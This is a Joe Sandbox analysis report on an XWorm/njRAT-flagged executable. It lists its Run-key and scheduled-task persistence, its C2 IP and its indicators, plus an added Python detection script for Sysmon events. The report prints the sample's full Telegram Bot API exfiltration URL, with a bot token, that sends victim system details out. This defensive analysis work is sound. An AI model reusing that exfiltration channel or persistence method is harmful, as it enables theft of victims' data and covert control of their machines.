Source | Detection | Scanner | Label | Link
file.exe | 47% | ReversingLabs | ByteCode-MSIL.Backdoor.njRAT
file.exe | 100% | Avira | TR/Dropper.Gen7
file.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\file.exe | 47% | ReversingLabs | ByteCode-MSIL.Backdoor.njRAT
C:\Users\user\WindowsUpdaterConf.exe | 47% | ReversingLabs | ByteCode-MSIL.Backdoor.njRAT
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.microsoft.( | 0% | Avira URL Cloud | safe
185.196.8.239 | 0% | Avira URL Cloud | safe
http://crl.microsoft/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot8070077125:AAEdRIyp1anHye9Y0jcV8uNF6U4mmijN8Pk/sendMessage?chat_id=1818813749&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20YD8OYZ2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 | false | | high
185.196.8.239 | true | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.1809974233.0000000005958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1866493773.0000000005DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1941064108.0000000005688000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | file.exe, 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000006.00000002.1803745466.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft | powershell.exe, 00000006.00000002.1816364705.00000000074A9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1875270222.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1875270222.00000000087C2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lBfq | powershell.exe, 00000006.00000002.1803745466.00000000048F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.0000000004691000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000006.00000002.1803745466.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.1809974233.0000000005958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1866493773.0000000005DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1941064108.0000000005688000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.co | powershell.exe, 00000006.00000002.1802768273.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.29.dr | false | | high
http://www.microsoft.( | powershell.exe, 00000009.00000002.1875270222.00000000087C2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | file.exe, 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1803745466.00000000048F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.0000000004691000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft/ | powershell.exe, 0000000C.00000002.1964621290.0000000007F52000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.196.8.239 | unknown | Switzerland | 34888 | SIMPLECARRER2IT | true
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
General Information
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1569488
Start date and time: 2024-12-05 19:39:02 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 44
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@39/52@2/3
EGA Information:
• Successful, ratio: 85.7%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 485
• Number of non-executed functions: 44
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.65.92, 52.182.143.212, 52.168.117.173
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5928 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6808 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big: too many NtCreateKey calls found
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtProtectVirtualMemory calls found
• Report size getting too big: too many NtQueryValueKey calls found
• Report size getting too big: too many NtReadVirtualMemory calls found
• Report size getting too big: too many NtSetInformationFile calls found
• VT rate limit hit for: file.exe
Timeline
Time | Type | Description
13:39:55 | API Interceptor | 5827120x Sleep call for process: file.exe modified
13:40:03 | API Interceptor | 53x Sleep call for process: powershell.exe modified
13:40:33 | API Interceptor | 5x Sleep call for process: WindowsUpdaterConf.exe modified
13:40:45 | API Interceptor | 7x Sleep call for process: WerFault.exe modified
18:40:05 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 666999666 C:\Users\user\AppData\Roaming\file.exe
18:40:14 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 666999666 C:\Users\user\AppData\Roaming\file.exe
18:40:33 | Task Scheduler | Run new task: WindowsUpdaterConf path: C:\Users\user\WindowsUpdaterConf.exe
18:40:33 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdaterConf C:\Users\user\WindowsUpdaterConf.exe
18:40:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdaterConf C:\Users\user\WindowsUpdaterConf.exe
18:40:49 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdaterConf.lnk
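The persistence entries in the timeline above (Run values named 666999666 and WindowsUpdaterConf pointing at executables under the user profile, a scheduled task of the same name, and a Startup-folder .lnk) and the hosts in the contacted-IP table (185.196.8.239, ip-api.com, api.telegram.org) translate directly into host and network detections. The Python below is an added example written for this page; it is not Joe Sandbox code and not part of the report. It matches those indicators against Sysmon-style event records. The event dicts, the user SID, and the schtasks command line are constructed for illustration (the report does not show the exact command line the sample used), and the rule names are ours.

```python
"""Added example: match this report's persistence and network indicators
against Sysmon-style event records.  All event data below is constructed."""
import re

# Indicators taken from the report's timeline and contacted-IP table.
RUN_VALUE_NAMES = {"666999666", "WindowsUpdaterConf"}
TASK_NAMES = {"WindowsUpdaterConf"}
C2_IPS = {"185.196.8.239"}
# Legitimate services the sample talks to: a hit is only a weak signal on its own.
WATCHED_DOMAINS = {
    "ip-api.com": "geo/hosting lookup (datacenter or sandbox check)",
    "api.telegram.org": "Telegram Bot API (used here for C2)",
}

RUN_KEY = re.compile(
    r"\\Software\\(?:Wow6432Node\\)?Microsoft\\Windows\\CurrentVersion\\Run\\([^\\]+)$",
    re.IGNORECASE,
)
# Executable placed directly in a user's profile root (C:\Users\<name>\x.exe).
PROFILE_ROOT_EXE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\[^\\]+\.exe$", re.IGNORECASE)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)
SCHTASKS_TN = re.compile(r'/tn\s+"?([^\s"]+)', re.IGNORECASE)


def check_event(ev):
    """Return [(rule, detail), ...] for one Sysmon-style event dict."""
    findings = []
    eid = ev.get("EventID")
    if eid == 13:  # RegistryEvent: value set
        m = RUN_KEY.search(ev.get("TargetObject", ""))
        if m:
            name, data = m.group(1), ev.get("Details", "")
            if name in RUN_VALUE_NAMES:
                findings.append(("run_key_ioc", f"{name} -> {data}"))
            if PROFILE_ROOT_EXE.match(data):
                findings.append(("run_key_profile_root_exe", data))
    elif eid == 1:  # ProcessCreate
        if ev.get("Image", "").lower().endswith("\\schtasks.exe"):
            m = SCHTASKS_TN.search(ev.get("CommandLine", ""))
            if m and m.group(1) in TASK_NAMES:
                findings.append(("schtask_ioc", m.group(1)))
    elif eid == 11:  # FileCreate
        path = ev.get("TargetFilename", "")
        if STARTUP_LNK.search(path):
            findings.append(("startup_folder_lnk", path))
    elif eid == 22:  # DnsQuery
        q = ev.get("QueryName", "").lower()
        if q in WATCHED_DOMAINS:
            findings.append(("watched_domain", f"{q}: {WATCHED_DOMAINS[q]}"))
    elif eid == 3:  # NetworkConnect
        ip = ev.get("DestinationIp")
        if ip in C2_IPS:
            findings.append(("c2_ip", ip))
    return findings


def scan(events):
    """Run check_event over events; return [(event_index, rule, detail), ...]."""
    return [(i, rule, detail)
            for i, ev in enumerate(events)
            for rule, detail in check_event(ev)]


# Constructed sample events modelled on the timeline above; not real telemetry.
SID = r"HKU\S-1-5-21-1-2-3-1001"  # assumed user SID
SAMPLE_EVENTS = [
    {"EventID": 13, "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\666999666",
     "Details": r"C:\Users\user\AppData\Roaming\file.exe"},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\schtasks.exe",  # command line is assumed
     "CommandLine": r'schtasks /create /f /sc onlogon /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe"'},
    {"EventID": 13, "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdaterConf",
     "Details": r"C:\Users\user\WindowsUpdaterConf.exe"},
    {"EventID": 11, "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdaterConf.lnk"},
    {"EventID": 22, "QueryName": "ip-api.com"},
    {"EventID": 3, "DestinationIp": "185.196.8.239"},
    {"EventID": 13, "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",  # benign control
     "Details": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The exact-name rules (run_key_ioc, schtask_ioc, c2_ip) are brittle by design and will miss a rebuilt sample; the structural rules (an executable sitting directly in a profile root, a fresh Startup-folder shortcut, an ip-api.com hosting lookup followed by Telegram traffic) are what carry over to the next build.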
IP context
Match | Associated sample name / URL | Detection | Threat name | Context
185.196.8.239 | bot.x86_64.elf | malicious | Mirai, Gafgyt, Okiru | -
185.196.8.239 | bot.arm.elf | malicious | Mirai, Gafgyt, Okiru | -
185.196.8.239 | bot.x86.elf | malicious | Mirai, Okiru | -
185.196.8.239 | bot.arm7.elf | malicious | Mirai, Okiru | -
185.196.8.239 | bot.m68k.elf | malicious | Mirai, Gafgyt, Okiru | -
185.196.8.239 | bot.arm5.elf | malicious | Mirai, Gafgyt, Okiru | -
185.196.8.239 | bot.sh4.elf | malicious | Mirai, Gafgyt, Okiru | -
185.196.8.239 | bot.ppc.elf | malicious | Mirai, Gafgyt, Okiru | -
185.196.8.239 | bot.mpsl.elf | malicious | Mirai, Gafgyt, Okiru | -
185.196.8.239 | bot.mips.elf | malicious | Mirai, Gafgyt, Okiru | -
208.95.112.1 | Cooperative Agreement0000800380.docx.exe | malicious | Babadeda, Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | 93z4kPX7B6.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | ip-api.com/line/?fields=hosting
208.95.112.1 | https___files.catbox.moe_l2rczc.pif.exe | malicious | Unknown | ip-api.com/json/?fields=225545
208.95.112.1 | LxgGXCC4AL.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | LMm6yxQtcf.exe | malicious | PureLog Stealer, zgRAT | ip-api.com/json/
208.95.112.1 | aZPQ3mKZSa.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | GZC0n65Ggl.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | aU1TV97585.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | mG93k6iBl4.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | 2zaGROpmo0.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
Domain context
Match | Associated sample name / URL | Detection | Threat name | Context
ip-api.com | Cooperative Agreement0000800380.docx.exe | malicious | Babadeda, Blank Grabber | 208.95.112.1
ip-api.com | 93z4kPX7B6.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 208.95.112.1
ip-api.com | https___files.catbox.moe_l2rczc.pif.exe | malicious | Unknown | 208.95.112.1
ip-api.com | LxgGXCC4AL.exe | malicious | XWorm | 208.95.112.1
ip-api.com | LMm6yxQtcf.exe | malicious | PureLog Stealer, zgRAT | 208.95.112.1
ip-api.com | aZPQ3mKZSa.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | GZC0n65Ggl.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | aU1TV97585.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | mG93k6iBl4.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | 2zaGROpmo0.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
api.telegram.org | ozctQoBg1o.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | SPhzvjk8wx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Q0Sh31btX8.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | o7H9XLUD9z.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 764GVLyJne.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | lQyRqxe4dt.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | G14yjXDQWf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Ti5nuRV7y4.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | cavKcghGwI.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 8WLOyt9f86.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
ASN context
Match | Associated sample name / URL | Detection | Threat name | Context
TELEGRAMRU | ozctQoBg1o.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | SPhzvjk8wx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | Q0Sh31btX8.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | o7H9XLUD9z.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | 764GVLyJne.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | lQyRqxe4dt.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | G14yjXDQWf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | Ti5nuRV7y4.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | cavKcghGwI.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | 8WLOyt9f86.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
SIMPLECARRER2IT | stail.exe | malicious | Socks5Systemz | 185.208.158.202
SIMPLECARRER2IT | getlab.exe | malicious | Socks5Systemz | 185.208.158.202
SIMPLECARRER2IT | chutmarao.ps1 | malicious | RHADAMANTHYS | 185.196.8.68
SIMPLECARRER2IT | RjygH3Vh7O.exe | malicious | RHADAMANTHYS | 185.196.8.68
SIMPLECARRER2IT | SekpL8Z26C.exe | malicious | Unknown | 185.208.159.79
SIMPLECARRER2IT | file.exe | malicious | Unknown | 185.208.159.79
SIMPLECARRER2IT | file.exe | malicious | Unknown | 185.208.159.79
SIMPLECARRER2IT | file.exe | malicious | Nymaim, Socks5Systemz | 185.208.158.202
SIMPLECARRER2IT | http://itrack4.valuecommerce.ne.jp/cgi-bin/2366370/entry.php?vc_url=http://serviceoctopus.com | malicious | HTMLPhisher | 185.208.158.251
SIMPLECARRER2IT | 0a0#U00a0.js | malicious | RHADAMANTHYS | 185.196.8.68
TUT-ASUS | Cooperative Agreement0000800380.docx.exe | malicious | Babadeda, Blank Grabber | 208.95.112.1
TUT-ASUS | 93z4kPX7B6.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 208.95.112.1
TUT-ASUS | https___files.catbox.moe_l2rczc.pif.exe | malicious | Unknown | 208.95.112.1
TUT-ASUS | LxgGXCC4AL.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | LMm6yxQtcf.exe | malicious | PureLog Stealer, zgRAT | 208.95.112.1
TUT-ASUS | aZPQ3mKZSa.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | GZC0n65Ggl.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | aU1TV97585.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | mG93k6iBl4.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | 2zaGROpmo0.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
JA3 fingerprint context
Match | Associated sample name / URL | Detection | Threat name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Cooperative Agreement0000800380.docx.exe | malicious | Babadeda, Blank Grabber | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | ozctQoBg1o.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | SPhzvjk8wx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Q0Sh31btX8.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | o7H9XLUD9z.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 764GVLyJne.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | lQyRqxe4dt.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | G14yjXDQWf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Ti5nuRV7y4.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | cavKcghGwI.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
                                                                                        No context
Dropped file
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.0425739531387612
Encrypted: false
SSDEEP: 96:mQFgnaxtHQJ5ZkcxLksLQXIDcQSc6f+cEdcw3H+BHUHZopAnQHdE7HeS9+xWAKTl:74MtO20cb+n6aSchhzuiFjZ24IO8dc
MD5: CC178E01E988DA051210DDDEC4B28F47
SHA1: ACE72E04433116E80FAC7B121A0CCC6C7D729AF8
SHA-256: 0D375F7B2B23E5F34745FA80908F9151B6B6786300B717CC05CB5F36CFD69EC1
SHA-512: 03A54ECB56C551191FCC90F076B0B50E5D3872F9F34C7F6FA9E85AC5A0D4B2F8765AC38D29D497424BB76054B0935A22A0E8B6B444A63BF119981D1709B9DC75
Malicious: false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.7.7.8.6.8.7.1.0.3.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.7.7.8.7.5.1.1.6.6.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.0.7.a.b.b.4.-.a.8.f.a.-.4.1.c.f.-.a.5.5.b.-.6.4.f.c.b.c.9.d.5.6.a.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.a.3.f.8.b.a.-.c.2.0.d.-.4.7.d.7.-.9.4.4.5.-.1.a.8.e.8.1.8.3.1.2.5.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.n.d.o.w.s.U.p.d.a.t.e.r.C.o.n.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.s.W.K.M.i.e.8.X.g.h.4.u.o.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.8.-.0.0.0.1.-.0.0.1.4.-.c.b.0.4.-.8.b.8.2.4.5.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.f.b.7.7.b.d.0.f.3.7.1.9.4.d.6.d.6.1.a.b.a.1.5.f.f.b.4.8.8.8.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.a.6.6.3.f.3.b.6.4.f.b.9.8.6.3.1.6.4.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.0488263975582648
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:pH+tO20cb+n6aGXL5TzuiFf9Z24IO8dc:Z+tscSn6a+JzuiFFY4IO8d
                                                                                        MD5:E7ACBDA576BB9CBE05D491FD3501BBEC
                                                                                        SHA1:34AFC308AAC78C78BBC86EB50D4B2C4561A696BE
                                                                                        SHA-256:3A232A61362D518BBCB1F9894D4B3D78B62AB35747582CF8F132F8F175694780
                                                                                        SHA-512:475122DBF68774C1C2AFFAE4897BE06A71ECF9B99BF48C46ADC3C9780E98B9F7A13E98D3690F159EC518226C0495094685B4826DA1DB8CDDE3D577B1CE5843EC
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.7.6.3.9.3.8.5.3.8.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.7.6.3.9.9.0.1.0.0.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.c.0.0.e.6.3.-.2.d.b.3.-.4.e.b.c.-.8.0.7.e.-.9.b.6.c.f.8.9.9.4.6.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.6.f.e.7.7.b.-.5.0.8.b.-.4.c.e.d.-.9.a.4.d.-.6.6.1.2.7.f.c.3.7.e.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.n.d.o.w.s.U.p.d.a.t.e.r.C.o.n.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.s.W.K.M.i.e.8.X.g.h.4.u.o.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.4.8.-.0.0.0.1.-.0.0.1.4.-.6.e.e.2.-.b.6.2.a.4.5.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.f.b.7.7.b.d.0.f.3.7.1.9.4.d.6.d.6.1.a.b.a.1.5.f.f.b.4.8.8.8.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.a.6.6.3.f.3.b.6.4.f.b.9.8.6.3.1.6.4.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.0425965202650278
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:x3O9y0O20cb+n6aichhzuiFf9Z24IO8dc:o9y0scSn6aRHzuiFFY4IO8d
                                                                                        MD5:9F4A319E9DFD7A7ED40B63DE332169B3
                                                                                        SHA1:B2DCB932E358F3CCEDD33145D1BF4965E2B5EEE6
                                                                                        SHA-256:0F7E8D08EA63F47A0E42AB05567CA80925FFF3426EC556D53EC23C77ACB62E8E
                                                                                        SHA-512:0D4D7336DFD16898468E4318F9FB97E9D140C7B6C4576DAB1285225D6AB30EEA985E9A0EE9D01BF103BC64C354F32C693134663E7F90BC81E432748475C1D2AA
                                                                                        Malicious:false
